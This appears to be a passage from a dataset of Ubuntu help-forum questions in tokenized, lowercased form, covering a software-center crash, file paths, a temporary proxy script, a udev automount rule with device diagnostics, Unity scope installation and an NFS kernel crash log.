/usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 372 , in _append_banner_ads scagent.query_exhibits ( ) file `` /usr/share/software-center/softwarecenter/backend/scagent.py '' , line 119 , in query_exhibits lang=get_language ( ) , series=self.distro.get_codename ( ) ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 92 , in get_codename self._distro_code_name = distro_info [ 'codename ' ] keyerror : 'codename' does anyone have an idea about how to approach this ? thanks
350458	file location python	i am complete newbie on linux and ubuntu . so my apologies for the dumb question . i have written python code in windows and want to run it in ubuntu , it uses an text file for input . the 'path-to-file ' in windows looks as follows c : user\documents\python\file.txt , how is the location written for ubuntu ?
350460	setting system wide proxy through bash script ( temporarily )	i 'm trying to temporarily set the system wide proxy option which is available as gui in the network settings through bash script . i only want the proxy to be applicable while the script is running and has to reset to no proxy when the script ends . so , basically , i am looking for something like : -- -- script start -- -- change proxy to a predefined ip , port combination run on close , reset proxy -- -- script end -- -- - now , i saw something on setting the environment variable but i am not sure how to apply this temporarily .
350462	using udev to automount external hdd	i have just installed a plex media server to my linux box and am happy with the idea of the server . my problem is the fact that plex is not discovering any of the files on my external hard drive . the drive in question is a western digital my passport ( 500gb ) formatted to ntfs and already has about 200+ gigs of movies on it . after searching the plex forums , i discovered i do not have the correct file permissions for the plex server to access the drive . in my search for answers , i have gotten far enough to figure out that a udev rule is my best option ( using fstab is out of the question , after all the drive is removable . : ) ) . i even got so far as to get most of the rule written ; it just is n't automounting ( as in , i plug the drive in , it mounts to normal ubuntu mount point /media/ $ username/my passport/ ) . : ( here is what i have so far in my rule : /etc/udev/rules.d/71-my-passport.rules kernel== '' sd ? [ 0-9 ] '' , attrs { manufacturer } == '' western digital '' , attrs { product } == '' my passport 0748 '' , action== '' add '' , run+= '' mount -o dmask=007 , fmask=117 , gid=1001 , uid=1000 /dev/ % k /media/my passport/ '' other random stuff : blkid /dev/sda1 : uuid= '' d3ebc281-e885-4770-9ef9-f69651f54a12 '' type= '' ext4 '' /dev/sda5 : uuid= '' 3569aee9-c16a-49ad-ba03-199180c59f60 '' type= '' swap '' /dev/sdb1 : label= '' my passport '' uuid= '' 948251618251493e '' type= '' ntfs '' udevadm info -a -n /dev/sdb1 udevadm info starts with the device specified by the devpath and then walks up the chain of parent devices . it prints for every device found , all possible attributes in the udev rules key format . a rule to match , can be composed by the attributes of the device and the attributes from one single parent device . looking at device '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb/sdb1 ' : kernel== '' sdb1 '' subsystem== '' block '' driver== '' '' attr { ro } == '' 0 '' attr { size } == '' 976705536 '' attr { stat } == '' 389 30494 32584 3040 0 0 0 0 0 1180 3040 '' attr { partition } == '' 1 '' attr { start } == '' 2048 '' attr { discard_alignment } == '' 0 '' attr { alignment_offset } == '' 0 '' attr { inflight } == '' 0 0 '' looking at parent device '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb ' : kernels== '' sdb '' subsystems== '' block '' drivers== '' '' attrs { ro } == '' 0 '' attrs { size } == '' 976707584 '' attrs { stat } == '' 467 30494 33208 3084 0 0 0 0 0 1224 3084 '' attrs { range } == '' 16 '' attrs { discard_alignment } == '' 0 '' attrs { events } == '' '' attrs { ext_range } == '' 256 '' attrs { events_poll_msecs } == '' -1 '' attrs { alignment_offset } == '' 0 '' attrs { inflight } == '' 0 0 '' attrs { removable } == '' 0 '' attrs { capability } == '' 50 '' attrs { events_async } == '' '' looking at parent device '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0 ' : kernels== '' 14:0:0:0 '' subsystems== '' scsi '' drivers== '' sd '' attrs { rev } == '' 1019 '' attrs { type } == '' 0 '' attrs { scsi_level } == '' 7 '' attrs { model } == '' my passport 0748 '' attrs { state } == '' running '' attrs { queue_type } == '' none '' attrs { iodone_cnt } == '' 0x1fb '' attrs { iorequest_cnt } == '' 0x1fb '' attrs { timeout } == '' 30 '' attrs { evt_media_change } == '' 0 '' attrs { max_sectors } == '' 240 '' attrs { ioerr_cnt } == '' 0x1 '' attrs { queue_depth } == '' 1 '' attrs { vendor } == '' wd `` attrs { device_blocked } == '' 0 '' attrs { dh_state } == '' detached '' attrs { iocounterbits } == '' 32 '' looking at parent device '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0 ' : kernels== '' target14:0:0 '' subsystems== '' scsi '' drivers== '' '' looking at parent device '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14 ' : kernels== '' host14 '' subsystems== '' scsi '' drivers== '' '' looking at parent device '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0 ' : kernels== '' 1-1.1:1.0 '' subsystems== '' usb '' drivers== '' usb-storage '' attrs { binterfaceclass } == '' 08 '' attrs { binterfacesubclass } == '' 06 '' attrs { binterfaceprotocol } == '' 50 '' attrs { bnumendpoints } == '' 02 '' attrs { supports_autosuspend } == '' 1 '' attrs { balternatesetting } == '' 0 '' attrs { binterfacenumber } == '' 00 '' attrs { interface } == '' msc bulk-only transport '' looking at parent device '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1 ' : kernels== '' 1-1.1 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { devpath } == '' 1.1 '' attrs { idvendor } == '' 1058 '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 12 '' attrs { configuration } == '' usb mass storage '' attrs { bmaxpower } == '' 500ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' 80 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 0 '' attrs { bcddevice } == '' 1019 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { serial } == '' 575832314336324c38343535 '' attrs { version } == '' 2.10 '' attrs { urbnum } == '' 1578 '' attrs { ltm_capable } == '' no '' attrs { manufacturer } == '' western digital '' attrs { removable } == '' removable '' attrs { idproduct } == '' 0748 '' attrs { bdeviceclass } == '' 00 '' attrs { product } == '' my passport 0748 '' looking at parent device '/devices/pci0000:00/0000:00:1a.0/usb1/1-1 ' : kernels== '' 1-1 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 01 '' attrs { devpath } == '' 1 '' attrs { idvendor } == '' 8087 '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 2 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 0ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 6 '' attrs { bcddevice } == '' 0000 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 310 '' attrs { ltm_capable } == '' no '' attrs { removable } == '' fixed '' attrs { idproduct } == '' 0024 '' attrs { bdeviceclass } == '' 09 '' looking at parent device '/devices/pci0000:00/0000:00:1a.0/usb1 ' : kernels== '' usb1 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { devpath } == '' 0 '' attrs { idvendor } == '' 1d6b '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { authorized_default } == '' 1 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 1 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 0ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 3 '' attrs { bcddevice } == '' 0308 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { serial } == '' 0000:00:1a.0 '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 53 '' attrs { ltm_capable } == '' no '' attrs { manufacturer } == '' linux 3.8.0-30-generic ehci_hcd '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 0002 '' attrs { bdeviceclass } == '' 09 '' attrs { product } == '' ehci host controller '' looking at parent device '/devices/pci0000:00/0000:00:1a.0 ' : kernels== '' 0000:00:1a.0 '' subsystems== '' pci '' drivers== '' ehci-pci '' attrs { irq } == '' 16 '' attrs { subsystem_vendor } == '' 0x17aa '' attrs { broken_parity_status } == '' 0 '' attrs { class } == '' 0x0c0320 '' attrs { companion } == '' '' attrs { consistent_dma_mask_bits } == '' 32 '' attrs { dma_mask_bits } == '' 32 '' attrs { local_cpus } == '' 00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000000f '' attrs { device } == '' 0x1e2d '' attrs { uframe_periodic_max } == '' 100 '' attrs { msi_bus } == '' '' attrs { local_cpulist } == '' 0-3 '' attrs { vendor } == '' 0x8086 '' attrs { subsystem_device } == '' 0x3977 '' attrs { numa_node } == '' -1 '' attrs { d3cold_allowed } == '' 1 '' looking at parent device '/devices/pci0000:00 ' : kernels== '' pci0000:00 '' subsystems== '' '' drivers== '' '' udevadm test $ ( udevadm info -q path -n /dev/sdb1 ) 2 > & 1 run_command : calling : test adm_test : version 175 this program is for debugging only , it does not run any program , specified by a run key . it may show incorrect results , because some values may be different , or not available at a simulation run . parse_file : reading '/lib/udev/rules.d/40-crda.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-gnupg.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-hplip.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-ia64.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-inputattach.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-libgphoto2-2.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-libsane.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-ppc.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-usb-media-players.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-usb_modeswitch.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-virtualbox-dkms.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-virtualbox-guest-dkms.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-virtualbox.rules ' as rules file parse_file : reading '/lib/udev/rules.d/42-qemu-usb.rules ' as rules file parse_file : reading '/lib/udev/rules.d/50-firmware.rules ' as rules file parse_file : reading '/lib/udev/rules.d/50-udev-default.rules ' as rules file parse_file : reading '/lib/udev/rules.d/55-dm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/56-hpmud_support.rules ' as rules file parse_file : reading '/lib/udev/rules.d/56-lvm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-btrfs.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-cdrom_id.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-pcmcia.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-alsa.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-input.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-serial.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-storage-dm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-storage-lvm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-storage-tape.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-storage.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-v4l.rules ' as rules file parse_file : reading '/lib/udev/rules.d/61-accelerometer.rules ' as rules file parse_file : reading '/lib/udev/rules.d/61-gnome-bluetooth-rfkill.rules ' as rules file parse_file : reading '/lib/udev/rules.d/64-xorg-xkb.rules ' as rules file parse_file : reading '/lib/udev/rules.d/66-xorg-synaptics-quirks.rules ' as rules file parse_file : reading '/lib/udev/rules.d/69-cd-sensors.rules ' as rules file add_rule : import found builtin 'usb_id ' , replacing /lib/udev/rules.d/69-cd-sensors.rules:85 parse_file : reading '/lib/udev/rules.d/69-libmtp.rules ' as rules file parse_file : reading '/lib/udev/rules.d/69-xorg-vmmouse.rules ' as rules file parse_file : reading '/lib/udev/rules.d/69-xserver-xorg-input-wacom.rules ' as rules file parse_file : reading '/etc/udev/rules.d/70-persistent-cd.rules ' as rules file parse_file : reading '/etc/udev/rules.d/70-persistent-net.rules ' as rules file parse_file : reading '/lib/udev/rules.d/70-power-switch.rules ' as rules file parse_file : reading '/lib/udev/rules.d/70-printers.rules ' as rules file parse_file : reading '/lib/udev/rules.d/70-uaccess.rules ' as rules file parse_file : reading '/lib/udev/rules.d/70-udev-acl.rules ' as rules file parse_file : reading '/etc/udev/rules.d/71-my-passport.rules ' as rules file parse_file : reading '/lib/udev/rules.d/71-seat.rules ' as rules file parse_file : reading '/lib/udev/rules.d/73-seat-late.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-cd-aliases-generator.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-net-description.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-persistent-net-generator.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-probe_mtd.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-tty-description.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-ericsson-mbm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-longcheer-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-nokia-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-pcmcia-device-blacklist.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-platform-serial-whitelist.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-qdl-device-blacklist.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-simtech-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-usb-device-blacklist.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-x22x-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-zte-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-nm-olpc-mesh.rules ' as rules file parse_file : reading '/lib/udev/rules.d/78-graphics-card.rules ' as rules file parse_file : reading '/lib/udev/rules.d/78-sound-card.rules ' as rules file parse_file : reading '/lib/udev/rules.d/80-btrfs-lvm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/80-drivers.rules ' as rules file parse_file : reading '/lib/udev/rules.d/80-mm-candidate.rules ' as rules file parse_file : reading '/lib/udev/rules.d/80-udisks.rules ' as rules file parse_file : reading '/lib/udev/rules.d/80-udisks2.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-brltty.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-hdparm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-hplj10xx.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-keyboard-configuration.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-lvm2.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-regulatory.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-usbmuxd.rules ' as rules file parse_file : reading '/lib/udev/rules.d/90-alsa-restore.rules ' as rules file parse_file : reading '/lib/udev/rules.d/90-alsa-ucm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/90-libgpod.rules ' as rules file parse_file : reading '/lib/udev/rules.d/90-pulseaudio.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-cd-devices.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-keyboard-force-release.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-keymap.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-kpartx.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-udev-late.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-dell.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-fujitsu.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-gateway.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-ibm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-lenovo.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-toshiba.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-csr.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-hid.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-wup.rules ' as rules file parse_file : reading '/lib/udev/rules.d/97-bluetooth-hid2hci.rules ' as rules file parse_file : reading '/lib/udev/rules.d/97-dmraid.rules ' as rules file parse_file : reading '/lib/udev/rules.d/99-steam-controller-perms.rules ' as rules file udev_rules_new : rules use 304140 bytes tokens ( 25345 * 12 bytes ) , 48779 bytes buffer udev_rules_new : temporary index used 83960 bytes ( 4198 * 20 bytes ) udev_device_new_from_syspath : device 0x7f5a65af2b70 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb/sdb1' udev_device_new_from_syspath : device 0x7f5a65af58b0 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb/sdb1' udev_device_read_db : device 0x7f5a65af58b0 filled with db file data udev_device_new_from_syspath : device 0x7f5a65af7de0 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb' udev_device_new_from_syspath : device 0x7f5a65af8610 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0' udev_device_new_from_syspath : device 0x7f5a65af8e30 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0' udev_device_new_from_syspath : device 0x7f5a65af9640 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14' udev_device_new_from_syspath : device 0x7f5a65af9e30 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0' udev_device_new_from_syspath : device 0x7f5a65afa620 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1' udev_device_new_from_syspath : device 0x7f5a65afae10 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1/1-1' udev_device_new_from_syspath : device 0x7f5a65afb600 has devpath '/devices/pci0000:00/0000:00:1a.0/usb1' udev_device_new_from_syspath : device 0x7f5a65afbde0 has devpath '/devices/pci0000:00/0000:00:1a.0' udev_device_new_from_syspath : device 0x7f5a65afc590 has devpath '/devices/pci0000:00' udev_rules_apply_to_event : group 6 /lib/udev/rules.d/50-udev-default.rules:67 udev_device_read_db : device 0x7f5a65af7de0 filled with db file data udev_rules_apply_to_event : link 'disk/by-id/usb-wd_my_passport_0748_575832314336324c38343535-0:0-part1 ' /lib/udev/rules.d/60-persistent-storage.rules:46 udev_rules_apply_to_event : link 'disk/by-path/pci-0000:00:1a.0-usb-0:1.1:1.0-scsi-0:0:0:0-part1 ' /lib/udev/rules.d/60-persistent-storage.rules:64 udev_rules_apply_to_event : import '/sbin/blkid -o udev -p /dev/sdb1 ' /lib/udev/rules.d/60-persistent-storage.rules:75 udev_event_spawn : starting '/sbin/blkid -o udev -p /dev/sdb1' spawn_read : '/sbin/blkid -o udev -p /dev/sdb1 ' ( err ) 'error : /dev/sdb1 : permission denied' spawn_wait : '/sbin/blkid -o udev -p /dev/sdb1 ' [ 28479 ] exit with return code 2 udev_rules_apply_to_event : run 'mount -o dmask=007 , fmask=117 , gid=1001 , uid=1000 /dev/ % k /media/my passport/ ' /etc/udev/rules.d/71-my-passport.rules:1 udev_rules_apply_to_event : import 'udisks-part-id /dev/sdb1 ' /lib/udev/rules.d/80-udisks.rules:88 udev_event_spawn : starting 'udisks-part-id /dev/sdb1' spawn_read : 'udisks-part-id /dev/sdb1 ' ( err ) 'using device_file=/dev/sdb syspath=/sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb , offset=1048576 ao=0 and number=1 for /dev/sdb1' spawn_read : 'udisks-part-id /dev/sdb1 ' ( err ) 'error opening /dev/sdb : permission denied' spawn_wait : 'udisks-part-id /dev/sdb1 ' [ 28480 ] exit with return code 0 udev_rules_apply_to_event : run '/sbin/modprobe -qba dm-multipath ' /lib/udev/rules.d/95-kpartx.rules:10 udev_event_execute_rules : no node name set , will use kernel supplied name 'sdb1' udev_node_update_old_links : update old name , '/dev/disk/by-label/my\x20passport ' no longer belonging to '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb/sdb1' link_find_prioritized : found 'b8:17 ' claiming '/run/udev/links/disk\x2fby-label\x2fmy\x5cx20passport' link_update : no reference left , remove '/dev/disk/by-label/my\x20passport' udev_node_update_old_links : update old name , '/dev/disk/by-uuid/948251618251493e ' no longer belonging to '/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb/sdb1' link_find_prioritized : found 'b8:17 ' claiming '/run/udev/links/disk\x2fby-uuid\x2f948251618251493e' link_update : no reference left , remove '/dev/disk/by-uuid/948251618251493e' udev_node_add : creating device node '/dev/sdb1 ' , devnum=8:17 , mode=0660 , uid=0 , gid=6 udev_node_mknod : preserve file '/dev/sdb1 ' , because it has correct dev_t udev_node_mknod : preserve permissions /dev/sdb1 , 060660 , uid=0 , gid=6 node_symlink : preserve already existing symlink '/dev/block/8:17 ' to '../sdb1' link_find_prioritized : found 'b8:17 ' claiming '/run/udev/links/disk\x2fby-id\x2fusb-wd_my_passport_0748_575832314336324c38343535-0:0-part1' link_update : creating link '/dev/disk/by-id/usb-wd_my_passport_0748_575832314336324c38343535-0:0-part1 ' to '/dev/sdb1' node_symlink : preserve already existing symlink '/dev/disk/by-id/usb-wd_my_passport_0748_575832314336324c38343535-0:0-part1 ' to '../../sdb1' link_find_prioritized : found 'b8:17 ' claiming '/run/udev/links/disk\x2fby-path\x2fpci-0000:00:1a.0-usb-0:1.1:1.0-scsi-0:0:0:0-part1' link_update : creating link '/dev/disk/by-path/pci-0000:00:1a.0-usb-0:1.1:1.0-scsi-0:0:0:0-part1 ' to '/dev/sdb1' node_symlink : preserve already existing symlink '/dev/disk/by-path/pci-0000:00:1a.0-usb-0:1.1:1.0-scsi-0:0:0:0-part1 ' to '../../sdb1' udev_device_update_db : unable to create temporary db file '/run/udev/data/b8:17.tmp ' : permission denied action=add devlinks=/dev/disk/by-id/usb-wd_my_passport_0748_575832314336324c38343535-0:0-part1 /dev/disk/by-path/pci-0000:00:1a.0-usb-0:1.1:1.0-scsi-0:0:0:0-part1 devname=/dev/sdb1 devpath=/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/host14/target14:0:0/14:0:0:0/block/sdb/sdb1 devtype=partition id_bus=usb id_instance=0:0 id_model=my_passport_0748 id_model_enc=my\x20passport\x200748 id_model_id=0748 id_part_table_type=dos id_path=pci-0000:00:1a.0-usb-0:1.1:1.0-scsi-0:0:0:0 id_path_tag=pci-0000_00_1a_0-usb-0_1_1_1_0-scsi-0_0_0_0 id_revision=1019 id_serial=wd_my_passport_0748_575832314336324c38343535-0:0 id_serial_short=575832314336324c38343535 id_type=disk id_usb_driver=usb-storage id_usb_interfaces=:080650 : id_usb_interface_num=00 id_vendor=wd id_vendor_enc=wd\x20\x20\x20\x20\x20\x20 id_vendor_id=1058 major=8 minor=17 subsystem=block udev_log=6 udisks_presentation_nopolicy=0 usec_initialized=19772580387 run : 'mount -o dmask=007 , fmask=117 , gid=1001 , uid=1000 /dev/sdb1 /media/my passport/' run : '/sbin/modprobe -qba dm-multipath'
350464	downloaded scopes not working - 12.04	i was trying to download some new scopes for unity ( cities specifically ) , and followed the basic terminal codes : sudo add-apt-repository ppa : scopes-packagers/ppa sudo apt-get update sudo apt-get install unity-lens-utilities unity-scope-cities after logging out/restarting , the only difference in the dash is i can use the calculator scope . cities does not seem to work . i also installed the grooveshark scope and wikipedia lens , and although the wiki tab is in the dash , no results show which seems like its a scope error . i 've searched and i have n't seen this issue . any ideas ? thanks !
350465	system crash reason	one of our server recently get frequently crash ... .i am pasting some of the syslog here , anyone familar with system would give me a hint what caused this ? much appreciated . i am using ubuntu 12.10 . sep 26 12:45:22 epgg2 kernel : [ 183.799965 ] pid : 1718 , comm : subtleknife not tainted 3.5.0-17-generic # 28-ubuntu dell inc. poweredge m710hd/037m3h sep 26 12:45:22 epgg2 kernel : [ 183.800593 ] rip : 0010 : [ < ffffffffa029ba73 > ] [ < ffffffffa029ba73 > ] nfs_file_set_open_context+0x23/0x80 [ nfs ] sep 26 12:45:22 epgg2 kernel : [ 183.801163 ] rsp : 0018 : ffff882414253b88 eflags : 00010286 sep 26 12:45:22 epgg2 kernel : [ 183.801467 ] rax : 0000000000000000 rbx : ffff882415c22100 rcx : 0000000000000046 sep 26 12:45:22 epgg2 kernel : [ 183.801922 ] rdx : 0000000000000046 rsi : ffff882415c22100 rdi : ffff882417960500 sep 26 12:45:22 epgg2 kernel : [ 183.802414 ] rbp : ffff882414253ba8 r08 : 0000000000000003 r09 : 0000000000000003 sep 26 12:45:22 epgg2 kernel : [ 183.802923 ] r10 : 0000000014930401 r11 : ffffffffa02af354 r12 : ffff882415903e00 sep 26 12:45:22 epgg2 kernel : [ 183.803341 ] r13 : ffff882415c22100 r14 : ffff8824147b05d8 r15 : ffff882415863680 sep 26 12:45:22 epgg2 kernel : [ 183.803751 ] fs : 00007f6a486fb700 ( 0000 ) gs : ffff88247fc00000 ( 0000 ) knlgs:0000000000000000 sep 26 12:45:22 epgg2 kernel : [ 183.804217 ] cs : 0010 ds : 0000 es : 0000 cr0 : 000000008005003b sep 26 12:45:22 epgg2 kernel : [ 183.813112 ] cr2 : 0000000000000030 cr3 : 0000002417dbb000 cr4 : 00000000000007f0 sep 26 12:45:22 epgg2 kernel : [ 183.822364 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 sep 26 12:45:22 epgg2 kernel : [ 183.831519 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 sep 26 12:45:22 epgg2 kernel : [ 183.840683 ] process subtleknife ( pid : 1718 , threadinfo ffff882414252000 , task ffff8824150e9700 ) sep 26 12:45:22 epgg2 kernel : [ 183.858177 ] stack : sep 26 12:45:22 epgg2 kernel : [ 183.866686 ] ffff882417960500 0000000000000000 ffff882415903e00 ffff882415c22100 sep 26 12:45:22 epgg2 kernel : [ 183.884425 ] ffff882414253c58 ffffffffa0299059 0000000014253bd8 ffff8824158d72b0 sep 26 12:45:22 epgg2 kernel : [ 183.902915 ] 0000800017960510 ffff8824158d72b0 0001000000008000 ffff88241641dc00 sep 26 12:45:22 epgg2 kernel : [ 183.921834 ] call trace : sep 26 12:45:22 epgg2 kernel : [ 183.930943 ] [ < ffffffffa0299059 > ] nfs4_file_open+0x169/0x1b0 [ nfs ] sep 26 12:45:22 epgg2 kernel : [ 183.940062 ] [ < ffffffff8118010f > ] __dentry_open+0x21f/0x330 sep 26 12:45:22 epgg2 kernel : [ 183.948970 ] [ < ffffffffa0298ef0 > ] ? nfs_setlease+0x10/0x10 [ nfs ] sep 26 12:45:22 epgg2 kernel : [ 183.958192 ] [ < ffffffff8118025a > ] vfs_open+0x3a/0x40 sep 26 12:45:22 epgg2 kernel : [ 183.966984 ] [ < ffffffff81181208 > ] nameidata_to_filp+0x58/0xb0 sep 26 12:45:22 epgg2 kernel : [ 183.975650 ] [ < ffffffff8118fb3f > ] do_last+0x49f/0xa10 sep 26 12:45:22 epgg2 kernel : [ 183.984227 ] [ < ffffffff81191399 > ] path_openat+0xd9/0x430 sep 26 12:45:22 epgg2 kernel : [ 183.992336 ] [ < ffffffff810561ec > ] ? release_task+0x2cc/0x480 sep 26 12:45:22 epgg2 kernel : [ 184.000385 ] [ < ffffffff81191811 > ] do_filp_open+0x41/0xa0 sep 26 12:45:22 epgg2 kernel : [ 184.008385 ] [ < ffffffff8119e906 > ] ? alloc_fd+0xc6/0x110 sep 26 12:45:22 epgg2 kernel : [ 184.016628 ] [ < ffffffff81181355 > ] do_sys_open+0xf5/0x230 sep 26 12:45:22 epgg2 kernel : [ 184.024512 ] [ < ffffffff811814b1 > ] sys_open+0x21/0x30sep 26 12:45:22 epgg2 kernel : [ 184.032264 ] [ < ffffffff81689d29 > ] system_call_fastpath+0x16/0x1b sep 26 12:45:22 epgg2 kernel : [ 184.040002 ] code : 0f 1f 84 00 00 00 00 00 55 48 89 e5 48 83 ec 20 48 89 5d e8 4c 89 65 f0 4c 89 6d f8 66 66 66 66 90 48 8b 47 18 48 85 f6 48 89 f3 < 4c > 8b 68 30 74 03 f0 ff 06 4d 8d a5 88 00 00 00 48 